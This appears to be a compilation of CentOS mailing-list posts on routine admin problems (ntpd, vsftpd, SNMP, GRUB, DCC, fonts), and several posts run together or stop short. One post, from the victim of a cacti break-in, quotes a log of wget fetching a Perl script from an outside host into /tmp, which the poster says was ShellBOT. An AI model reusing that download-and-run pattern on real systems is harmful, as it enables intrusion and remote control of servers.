Have used Centos 5 now couple of weeks and started to find pieces on places, ie. found logs :D Now, these ntpd errors strances me. Anyone else getting these? Errors frequency error 500 PPM exceeds tolerance 500 PPM: 1 time(s) frequency error 503 PPM exceeds tolerance 500 PPM: 1 time(s) frequency error 504 PPM exceeds tolerance 500 PPM: 1 time(s) frequency error 505 PPM exceeds tolerance 500 PPM: 1 time(s) frequency error 509 PPM exceeds tolerance 500 PPM: 3 time(s) frequency error 512 PPM exceeds tolerance 500 PPM: 203 time(s) I compiled vanilla kernel 2.6.21.2 into use, just by oldfasion way "make menuconfig, make, make install", used .config from original kernel, came with distro. Only changed prosessor type into K7. Running x86 system, with 512M ram. Some about 200G HD space.. Syncing time into ntp1.funet.fi, but I think that's not the reason, because tried some other servers too, and got somewhat same results... Despite of errors, all seems to work, or do I imagine that? vsftp anonymous upload access

I'm trying to set up anonymous ftp using vsftp. I want to be able to allow uploads. The anonymous id is userid "ftp". The ~ftp/ directory is actually owned by root, but ~ftp/pub is owned by ftp. Here's the vsftpd.conf: anonymous_enable=YES anon_upload_enable=YES local_enable=NO write_enable=NO local_umask=022 dirmessage_enable=YES xferlog_enable=YES xferlog_std_format=YES userlist_enable=YES listen=YES tcp_wrappers=YES I'm able to login to "ftp", and I'm able to "cd pub". The pub directory has permissions ownership ftp:ftp and perms of 750 or: drwxr-x--- 2 ftp ftp 4096 May 14 12:43 /var/ftp/pub Since I'm logged on as "ftp" I should be able to create the file inside the directory and write to it. BTW, I've had this problem whether write_enable=YES|NO and unless I'm misreading the docs, write_enable shouldn't affect actual uploads. What am I doing wrong? === Al

Centos - 4.x - VAIO notebook heating up

Hi friends, I have a problem i have VAIO VGN-F seies notebook which was performing slow on main power source, working fine on battery i did some tweaks on CPU speeds reading a lot of tutorials , i do not know whether this or somthing else has now started making mine notebook got heated up , i mean it is heatin up from base. I also have windows on the same system (dual boot), it was also heating up , i then installed NHC (Notebook Hardware Control ) on windows XP, it reduced the CPU speed and which probably increases load on the system, this removed the heating problem of CPU. I have a question that is there a similar s/w availble on linux Centos 4.xor i need to reinstall the OS or can it be a hardware problem the CPU heating up. Has someone experienced the same problem , NHC says the earlier temp of my CPU was above 90 degree C now it is 60 degree C. Thanks, Early answers expected, Regards, Abhishek jain

Suggested way to remotely monitor servers and networks these days?

Hi folks, I'm just wondering what is the recommended way of monitoring servers and networks remotely. My current setup is to install and configure cacti and nagios. I've set these up to require SSL. This way, I can easily go to them and login from wherever I am and monitor (almost) everything I need to monitor. The problem is that leaving cacti open was the most stupid thing I've done. After checking /var/log/httpd/error_log, I saw that someone exploited a cacti php file and the result was: --08:13:11-- http://psaico.host.sk/desk.pl => `/tmp/desk.pl' Resolving psaico.host.sk... 62.168.109.150 Connecting to psaico.host.sk|62.168.109.150|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 20,144 (20K) [text/x-perl] 0K .......... ......... 100% 28.26KB/s 08:13:13 (28.26 KB/s) - `/tmp/desk.pl' saved [20144/20144] which immediately downloaded ShellBOT to /tmp and executed it. It was a good thing I caught this as early as I did. So, what's everyone elses solution these days? Or is it simply a matter of creating a /tmp partition and mounting it noexec? On a side note... anyone with experience with ShellBOT? From research, it seems to attempt to connect to an IRC server upon running. So if my outgoing connections are secured by iptables, can I assume it never got connected at all? I'll probably try this out someday but just looking for a quick experienced answer. Thanks! dex

Issues with SNMP

Hello, I'm wondering if anyone else is seeing the same issues I'm seeing here. I have recently upgraded one of my systems from 4.4 to 4.5 and ever since then I cannot get snmp to work. I am monitoring the interface traffic. Please keep in mind the firewall/router I do the same thing without any issues for 4 interfaces and it is still at 4.4 and doesn't have any issues. If I try an snmpwalk I get the following; ~~~~~~~~~~~~~~~~~~~~~~ snmp $ snmpwalk -v 1 -c <string> localhost system Timeout: No Response from localhost snmp $ snmpwalk -v 2c -c <string> localhost system Timeout: No Response from localhost ~~~~~~~~~~~~~~~~~~~~~~ snmpd is up and running according to the system ~~~~~~~~~~~~~~~~~~~~~~ snmp $ service snmpd status snmpd (pid 7884) is running... ~~~~~~~~~~~~~~~~~~~~~~ snmp.conf file hasn't changed since I last changed it in Jan. I'm stumped as to why it is not working and don't want to upgrade the router/firewall box, which is working without any issues, until this get fixed. Can someone point me to what I am missing or point me in the right direction? Thnx! Coping music from tapes

OS: CentOS 5.0 x86. Hi, I have some old music tapes and a walkman, and want to move the music to mp3 format. So far I am thinking to use Audacity to record the music to wavs, and then do not know, somehow I will compress the wavs to mp3s as vbr 192 Kbps with something. Has anyone done this? What app did you use for recording the music from the tapes and what app did you use to make it mp3? Unfortunately my mp3 player doesn't support ogg vorbis, so this is not an option. Two Linux books I recommend

I would like to recommend two (2) Linux books that might be helpful to some of the people reading this mailing list: (1) "Red Hat Fedora and Enterprise Linux Bible", by Christopher Negus. Published by Wiley. Buy the edition for the version of CentOS you are using. This book is very easy to read and is probably best for Beginning to Intermediate users. This is the book I reach for first. (Disclaimer: I wrote a review that was published in one edition of the book and I received free copies of two editions. I have also purchased several editions) (2) "Running Linux", published by O'Reilly. This book is a classic and was recommended to me by an engineer at Red Hat. I have the 4th edition, but there is a later edition available. This book is a tougher read, but, it goes into things more deeply than the other book I recommend. Probably best for Intermediate and Advanced users. I've purchased 2 or 3 editions of this book. There are probably many other excellent Linux books available that others can recommend, especially about specific topics. HTH, Lanny

Xen and overall system load

In a CentOS 5 dom0, how does one find out the overall system load? In the early days of Xen, I believe an uptime on dom0 provides an overall load for the server. This doesn't seem to be the case anymore.

sata_via freeze

Hi all, I have a machine with a Assus P5VD2-MX, it has a VIA chipset. The problem is sometimes without any reason all freeze, can't use network and when I type a command in shell occur a I/O error. I already test memory, and the problem are in two similars machines. I see in CentOS foruns someone with the same problem using the sata_via driver but without an answer. I'm running Centos 5, in BIOS disable Jmicron raid, and the sata is in IDE mode. Thanks all.

Oh, I just remembered something else. We were getting a memory error too, either on startup or shutdown, I don't remember which (someone else was actually doing all the work, I just helped a little). After turning off the swap option, the error disappeared.

I thought some people here might like to know what we just found out while trying to get VMWare running under CentOS 5. Before we found the note about changing VMWare from 2 to 1 CPU's, we went to `Edit' -> `Preferences' -> `Memory' and changed the memory option to: Fit All virtual memory into reserved host RAM It had been set to the next option down, second out of 3 (we don't have the system any more to see what it said word for word). This had a HUGE effect on performance. Before the change, it would take several minutes to do anything under VMWare. Startups and shutdowns were dog slow. Turning off the swap options helped a lot. After that, we also changed from 2 to 1 CPU's and that helped a little bit, but the memory option change had the biggest effect. Just thought you might like to know.

Questions about network configuration

Hi, I'm currently reading chapter 13 of the RHEL Deployment Guide, and taking some notes. I have a few minor questions: /etc/sysconfig/network According to the doc: "This file specifies routing and host information for all network interfaces." Here's how mine looks like: --8<----------------- NETWORKING=yes NETWORKING_IPV6=yes HOSTNAME=fujitsu.zuhause GATEWAY=192.168.1.254 --8<----------------- NETWORKING_IPV6= -> I wonder if I can switch that to 'no', since I simple don't use IPV6. Will some apps mysteriously refuse to work when I do this? (You never know...) HOSTNAME=... -> this looks like a redundancy with information provided in /etc/hosts. So what is it for? Can it be left out? GATEWAY=... -> another redundancy, since it's also to be found in /etc/sysconfig/network-scripts/ifcfg-<interface>. Leave it out if it's in the individual interface scripts? More questions to come, but here's a first bunch :o) Cheers, Niki PS: I've started on Linux with Slackware (7.1), hence a habit of configuring my system with Vi rather than some configuration helpers. Hi, I am trying to install CentOS on an Intel DG965RYCK. I had came to DRUID and wanted to customize the PATA Harddisks for RAID. But it would not detect the harddisks. In the CMOS, both the 500 GB IDE Harddisk are being detected. Any idea? Thanks

Greets Anyone on the list using newer HP G4 or G5 server hardware like DL36X or DL38X with Centos? Or other HP hardware? Are you running Intel, AMD, or both? Are you using SAS or SATA or a mix? Are you using Centos 3, CentOS 4, or starting migration to CentOS 5 Are things rock solid stable without any issues? I know older Compaq and HP boxen have been rock solid for us for years yet we wanted to check and test the waters b4 we consider unloading some bread. Deployment Guide in french?

Hi, I have CentOS 5 installed, and I'd like to read the RHEL 5 Deployment Guide in french. The online version seems to be available in english only. There's an RPM package on my system: # rpm -qa | grep -i depl Deployment_Guide-fr-FR-5.0.0-19.el5.centos Deployment_Guide-en-US-5.0.0-19.el5.centos Now what does the package consist of? 'rpm -ql' on the package shows a series of .xml files in /usr/share/doc/Deployment_Guide-fr-FR-*. Question: how do I access these? My GNOME desktop is in french OK. Only when I access the help browser via 'Système -> Documentation -> Enterprise Linux Deployment Guide', I get access to the english version, but the french version is nowhere to be found. dcc error on centos 5

Hi, I set up DCC on CentOS 5 with Dual Sendmail - Amavisd-new and and Spam assassin. I installed DCC from AT rpms. pls see below for installed DCC rpm. [root@mailgw ~]# rpm -qa |grep DCC DCC-1.3.50-16.0.el5 Then, I configured in Deamon mode. I did below steps. [root@mailgw ~]# yum install DCC then, [root@mailgw ~]# cdcc "delete 127.0.0.1" [root@mailgw ~]# cdcc "delete 127.0.0.1 Greylist" then, edited /etc/dcc/dcc_conf [root@mailgw ~]# vi /etc/dcc/dcc_conf I changed DCCIFD_ENABLE=off to DCCIFD_ENABLE=on then, [root@mailgw ~]# cp /usr/libexec/dcc/rcDCC /etc/rc.d/init.d/ [root@mailgw ~]# chkconfig rcDCC on And finally,I edited SpamAssassin's configuration file, and tell it where to find the path to DCC: vi /etc/mail/spamassassin/local.cf Add this to the end of the file: dcc_home /usr/libexec/dcc then, Edit the file v310.pre: vi /etc/mail/spamassassin/v310.pre I changed #loadplugin Mail::SpamAssassin::Plugin::DCC to ( I removed the # mark) loadplugin Mail::SpamAssassin::Plugin::DCC then, [root@mailgw ~]# /etc/init.d/spamassassin restart Stopping spamd: [ OK ] Starting spamd: [ OK ] then, [root@mailgw ~]# /etc/init.d/rcDCC start Then, I checked logs, It gives below erros. I have installed CentOS 5 with all updates. Also I have 2 ne2000 isa cards. Searching the web has not provided any useful information. According to the documentation in make xconfig, isa and isapnp support have to be compiled into the kernel. I know that I have either not set a parameter, doing commands in the wrong order or I have missed a step, but I have not been able to determine what. I have even tried to change the order of the commands without luck. Any help will be greatly appreciated, David

I am running centos 4.x and 5 x86_64 and using the script below and the slider bar at the bottom I cannot get fonts bigger than 50. someone else posted a followup and said he has the same issue. What can be happening here??? xlsfonts shows that bigger fonts are available. How can I get bigger fonts??? Note - I had to do a "yum install tk" also... Hi, is there anything happening to the csgfs repo ? The packages in there are extremely old. At least for CentOS 4.5 Kernels there should be an update. I would like to help package them if possible. OS: CentOS 5.0 x86. In the past while I was using SL 4.x. I was using BestCrypt. Now in CentOS 5.0, neither BestCrypt nor TrueCrypt seem to work. Is there any volume encryption or full HDD encryption that works with CentOS 5.0 out there (preferably in single-user mode)?

I am trying to install on a CentOS5 box http://www.mjmwired.net/resources/files/msttcorefonts-2.0-1.noarch.rpm then did an xfs restart, even an alt-ctrl-backspace. The fonts are located in /usr/share/fonts/msttcorefonts/ with the owner root & 644. I can't see them when I go to preferences > fonts. We had a similar problem. I believe there was an error message in our system log files that pointed to the solution. I logged in remotely and deleted a problem file. I'm not 100% sure what the file was, but I think it was something like .ICEauthority or a variation on it. Some how the file got corrupted and when root tried to login, it was quickly kicked out. Source RPM -- need to rebuild ldap client tools

Hi all, I believe the last yum update I performed installed a new openldap-client for me, including SASL support. I used to be able to perform ldapsearch without explicitly passing '-x' to the command line to pull the directory down. Now, I receive the following: ldap_sasl_interactive_bind_s: No such attribute (16) Would my best bet be to find a source RPM and rebuild the ldap client without sasl support? If so, where's my best bet to grab this and do it the "proper" CentOS way. Thanks, - sf

CentOS 4 won't boot on test machine

I must have really shot myself in the foot on this one. I reinstalled CentOS 4.4 (have to, for now) on my test machine, exactly the way it was before (same options anyway), but when it comes up, I get: Booting 'CentOS-4 x86_64 (2.6.9-42.ELsmp)' root(hd1,0) Filesystem type is ext2fs, partition type 0x83 kernel /vmlinuz-2.6.9-42.ELsmp ro root=LABEL=/ rhgb quiet Error 15: File not found Press any key to continue... If I press any key, I get a garbled screen that is nearly impossible to read. So, I rebooted from the DVD in rescue mode, ran fdisk to verify that the partitions are set up correctly, ran e2fsck on all three formatted partitions (sde1 - /boot, sde3 - /, sde6 - /home), ran e2label to make sure the labels are set correctly and everything checks out. All the file images are present in /boot where they should be, and the device map shows hd1 is /dev/sde3. Is my disk rotten or something? Everything is in the right place (so far) but it won't boot. The test machine is of a type I don't recognize, it's running a 2.88GHz Xeon processor with 8Gb of memory, a 4-disk RAID SATA controller (currently configured as 4 separate drives, one of which is "spared" because it did go bad) and a WD hard drive as /dev/sde. It has a 17" FP monitor with an ATI <something> XL video card, though I doubt that last part is terribly relevant. Hi, Thanks a lot for so many helpful responses. The fix is pretty straight: just mount /dev/pts again at the chrooted %post environment where my original sshd fires up from. One command 'Mount -t devpts -o rw,gid=5,mode=620 devpts /dev/pts' or just a bare 'mount /dev/pts' command fix the problem since the devpts entry is in fstab already. I also hacked image stage2.img to include sshd daemon binary, libraries and configuration files, and fire up the ssh daemon at the first line of %pre script section. Then disable my original fired up sshd daemon at %post section. Recommendations

We have two virtual machines on ESX 3 running CentOS 4.3 and we'd like to turn them into some sort of highly available nfs file server. Currently, I am familiar with DRBD and RHCS but I was curious what others might recommend in such a situation. I'm not sure how easily we could use RHCS in such a situation because we don't really have the advantage of shared storage in this setup. We are strictly limited to the two boxes. Having said that, it would be nice to have some of the exports running on one node (tied to a VIP) and others on the other node (tied to another VIP) if possible and manage those services individually if needed. So basically both nodes would be exporting select locations at any given time on this highly available file system. That is not 100% necessary but it would be nice if the capability is there. I would assume some sort of fencing mechanism would need to been in place as well. This might not be the best place to ask an ESX question but would 'raw device mapping' work in such a scenario? I don't know much about it. I can give more details if needed but hopefully this is enough for some suggestions. Thanks!

It gets all the way through the install, and then when it reboots, grub can't find the kernel. Grub can't find the kernel because the kernel was not instaled for some reason? I looked at the box through rescue mode and in /boot there is no kernel. Any ideas what might have happened? Cheers...james

I have 3 partitions: /boot - Because it can't be striped. It is mirrored across 4 drives on 2 controllers, just so the disk space isn't completely wasted. The partitions are there, so I'm using them. Each drive is also bootable as I used GRUB on each one. swap - 1 partition on 4 drives on 2 controllers and I just let the OS handle the swap space anyway it wants to do and I don't use any software RAID options. All 4 partitions have `defaults,pri=1' in the /etc/fstab file. / - 1 partition on 4 drives on 2 controllers all striped together as one file system. I've found over the years any more partitioning than that is just a waste of disk space. If I had more partitions, I usually ended up with one partition with a lot of excess space and others with not enough. It was just easier to have everything together. On the current system we have about 600GB of disk space available with only 5% of it used. I'm not worried about anything getting filled up any time soon. Users who fill up drives get shot and then chastised. :-)
